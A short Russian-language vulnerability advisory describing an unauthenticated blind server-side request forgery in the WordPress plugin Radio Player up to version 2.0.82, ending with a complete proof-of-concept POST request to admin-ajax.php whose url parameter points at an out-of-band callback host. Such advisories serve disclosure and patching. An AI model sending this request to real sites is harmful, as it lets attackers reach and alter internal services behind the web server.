
Radio Player <= 2.0.82 - Слепая неаутентифицированная подделка серверных запросов
Radio Player <= 2.0.82 - Неаутентифицированная Server-Side Request Forgery
Плагин Radio Player – Live Shoutcast, Icecast and Any Audio Stream Player для WordPress уязвим к Server-Side Request Forgery во всех версиях до 2.0.82 включительно. Это позволяет неаутентифицированным злоумышленникам отправлять веб-запросы в произвольные места из веб-приложения, которые можно использовать для запроса и изменения информации во внутренних сервисах.
POST /wp-admin/admin-ajax.php HTTP/2
Host: wp-dev.ddev.site
Content-Type: application/x-www-form-urlencoded
Content-Length: 127
action=radio_player_get_stream_data&nonce=feb9ecfbfa&utm_source=&url=http://918sodewycbbjnbts7cxy5bqyh48s0gp.bc.oast.site/live.m3u8